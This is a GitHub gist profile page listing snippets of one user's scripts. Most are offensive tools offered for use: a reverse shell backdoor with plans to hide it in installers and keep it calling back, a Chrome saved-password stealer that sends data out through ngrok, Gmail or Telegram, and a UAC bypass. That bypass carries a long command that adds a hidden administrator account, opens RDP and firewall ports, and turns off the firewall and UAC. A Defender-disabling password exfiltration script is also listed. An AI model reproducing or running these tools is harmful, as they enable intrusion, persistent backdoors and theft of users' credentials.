Skip to content

Instantly share code, notes, and snippets.

View wildonion's full-sized avatar
πŸ’­
future.await;

dewo wildonion

πŸ’­
future.await;
View GitHub Profile
@wildonion
wildonion / browser.py
Last active October 28, 2020 20:41
a simple browser script
# socket python browser
# TODO : we can access to cookie on client side then why we just don't put some virus or backdoor in user cookie so everythime he/she try to load our site our virus run itself from cookie! our encoded jwt has some virus code(js/python/bytecode) with expiration date so when our user try to login this code will sign and we send its token along with the secret key to the client then on a specific time this token will decrypt.
import socket
import sys
host = sys.argv[1]
port = 80 # web
@wildonion
wildonion / client.py
Last active October 28, 2020 20:41
WOruttle __ simple reverse shell backdoor using socket
# REF: https://msdn.microsoft.com/en-us/library/windows/desktop/aa384006(v=vs.85).aspx
# REF: https://www.youtube.com/watch?v=8GVumPe57o4
# REF: http://www.pyinstaller.org/
# WARNING: for schedule n_minutes get help from Python_Reverse_TCP folder codes
# TODO: convert client.py to base64 encdoe and exe file(using pyinstaller) -> above REF + pyherion.py file
# TODO: inject exe file into any installaion package -> above youtube REF
# TODO: schedule n_minutes in which forces victim to try to connect to attacker every n_minutes -> it's a meterpreter feature(persistence backdoor); alsoe see its REF
# TODO: use argparser or sys.argv[] to get the ip and port from commandline if you want to use it with ngrok
# TODO: test it with ngrok tcp protocol
@wildonion
wildonion / snatchDB_c.py
Created October 28, 2020 20:00
snatching google chrome login data
# https://null-byte.wonderhowto.com/how-to/grab-all-passwords-0163301/
# https://pastebin.com/LV2XPc2R, https://pastebin.com/sd5aqTez
# use socket programming with ngrok to recv the dbs
# u can use gmail also to recv dbs after you send them to your account
# u can use telepot to send the dbs to your ICFU bot
# u can use post-exploitation in msf to steal browser passwords
# after choosing your way of doing this shity thing just make an exe file with tor icon from SnatchDB_C.py
# the only important thing for us is Login Data or logins table u can get other info such as history and cookies using Snatch.py code
'''
@wildonion
wildonion / simpleRVTCPclient.py
Created October 28, 2020 20:01
simple reverse tcp script
import socket
import os
import subprocess
#1
target_host = "127.0.0.1"
target_port = 8764
#2
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((target_host,target_port))
#3
@wildonion
wildonion / pscanner.py
Created October 28, 2020 20:03
a simple port scanner script
#!/usr/bin/python
from socket import *
import sys, time
from datetime import datetime
host = ''
@wildonion
wildonion / pc.py
Created October 28, 2020 20:04
a simple password cracker script
#!/usr/bin/python
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('dictionary.txt' , 'r')
for word in dictFile.readLines():
word = word.strip('\n')
cryptWord = crypt.crypt(word,salt)
@wildonion
wildonion / KrY.py
Last active October 28, 2020 20:09
UAC bypassing using fodhelper (trusted binary bug) on windows
import os, ctypes, sys
# os.system("net user W%computername%O vocfu1203 /add && net localgroup administrators W%computername%O /add && mkdir C:\system-01 && cd system-01 && attrib system-01 +h && net share trojan-share$=C:\system-01 /grant:WO,full /grant:everyone,full && netsh firewall set service type = fileandprint mode = enable && netsh firewall set service type = remotedesktop mode = enable && netsh advfirewall firewall set rule group='remote desktop' new enable=Yes && netsh advfirewall firewall add rule name='Open Ports' dir=out action=allow protocol=TCP localport=8080-445-443-6777-3389 && reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections/t REG_DWORD /d0/f && netsh advfirewall set allprofile state off && reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f && ipconfig /all > C:\system-01\%computername%.txt && getmac > C:\system-01\%computername%.txt && net user > C:\system-01\%computername%.txt && po
@wildonion
wildonion / karnuagh_map.py
Last active November 27, 2020 15:19
karnuagh map using sop (minterms)
# STATUS : incomplete
# http://www.32x8.com/index.html
# https://www.youtube.com/watch?v=RO5alU6PpSU
# https://realpython.com/primer-on-python-decorators/
# https://www.allaboutcircuits.com/textbook/digital/chpt-8/logic-simplification-karnaugh-maps/
@wildonion
wildonion / httpServer.py
Created October 28, 2020 20:11
a simple http server
#!/usr/bin/python
# build a httpserver like flask
# python http webserver using http module(watch?v=hFNZ6kdBgO0) or socket module(watch?v=_najJkyK46g) or flask module(watch?v=vyCboBjK4us) or watch?v=2KeSfeIo2MI
import socket # Networking support
import signal # Signal support (server shutdown on signal receive)
import time # Current time
class Server:
""" Class describing a simple HTTP server objects."""
@wildonion
wildonion / offdef.py
Last active December 19, 2020 11:34
a simple script to turn windows defender off and send all passwords using LaZagne through a telegram bot
#!python
# coding: utf-8
'''
Designed By :
β–ˆ β–ˆβ–‘ β–ˆβ–ˆβ–“ β–ˆβ–ˆβ–“ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–„ β–ˆ β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–„ β–ˆ
β–“β–ˆβ–‘ β–ˆ β–‘β–ˆβ–‘β–“β–ˆβ–ˆβ–’β–“β–ˆβ–ˆβ–’ β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–Œβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’ β–ˆβ–ˆ β–€β–ˆ β–ˆ β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’ β–ˆβ–ˆ β–€β–ˆ β–ˆ
β–’β–ˆβ–‘ β–ˆ β–‘β–ˆ β–’β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–‘ β–‘β–ˆβ–ˆ β–ˆβ–Œβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’
β–‘β–ˆβ–‘ β–ˆ β–‘β–ˆ β–‘β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–‘ β–‘β–“β–ˆβ–„ β–Œβ–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’
β–‘β–‘β–ˆβ–ˆβ–’β–ˆβ–ˆβ–“ β–‘β–ˆβ–ˆβ–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“ β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆβ–‘β–‘β–ˆβ–ˆβ–‘β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆ
cRi3d on windows 10 using regedit >> by cL34n 3v3RytH!n9